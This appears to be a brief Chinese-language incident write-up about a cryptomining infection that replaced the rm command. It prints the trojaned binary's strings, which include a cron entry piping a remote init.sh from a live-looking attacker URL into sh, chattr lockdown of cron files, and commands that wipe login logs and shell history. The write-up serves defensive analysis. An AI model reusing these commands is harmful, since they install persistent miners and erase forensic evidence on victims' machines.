有台服务中了挖矿后,杀进程删程序,发现删除不了,后面怀疑rm命令有问题进行简单分析确认了命令被替换了,后面将正常rm进行替换后正常,将挖矿程序清除。
异常rm的md5值:
[root@testvm wakuang]# md5sum rm
f3eda9bab1244305d976c4f07b23ce4c rm用strings打印rm中内容发现异常:
ulimit -d unlimited
ulimit -m unlimited
ulimit -s unlimited
ulimit -t unlimited
ulimit -v unlimited
ulimit -u unlimited
ulimit -n 1048000
popen %s error
echo 123 > /etc/velog
/etc/velog
/proc/self/exe
Failed
Error opening file
/usr/bin/wget
wget -P
-t 3 -T 20
/usr/bin/get
get -P
/usr/bin/curl
curl
--connect-timeout 10 --max-time 30 --retry 3 >
/usr/bin/url
url
ps -fe|grep
|grep -v grep|grep -v defunct
cat
error in fork:%s
error in exec function:%s
chattr -ia
chmod 777
chattr +ia
rm -f
setsid() failed (errno = %d)
chdir() failed (errno = %d)
history - c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
curl -fsSL --connect-timeout 30 --max-time 30 --retry 3
| sh
url -fsSL --connect-timeout 30 --max-time 30 --retry 3
pkill
chmod 000
echo 123aaa >>
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
dmidecode|grep "System Information" -A9
cat /proc/meminfo
free -m
df -h
ifconfig -a
dmidecode -t bios
strings /usr/lib64/libstdc++.so.6|grep GLIBCXX
cat /proc/uptime
cat /proc/version
lspci | grep Ethernet
top -n 1|head -n 5
cat /etc/issue
chattr -ia /var/spool/cron
chattr -ia /var/spool/cron/root
/var/spool/cron/root
echo >> /var/spool/cron/root
echo "*/6 * * * * curl -fsSL
| sh > /dev/null 2>&1 " >> '/var/spool/cron/root'
echo "*/6 * * * * url -fsSL
cat '/var/spool/cron/root' |grep init.sh
init.sh
chmod 644 /var/spool/cron/root
chattr +ia /var/spool/cron/root
chattr +ia /var/spool/cron
chattr +ia /etc/cron.d
/usr/bin/rmm
QsjeVXG9
http://w.lazer-n.com:43768/init.sh
执行完rm会从公网将挖矿程序以及计划任务全部重新下载一遍,将命令从其他机器拷贝替换恢复rm功能,将挖矿脚本修改将所有程序删除。
COMMENTS | NOTHING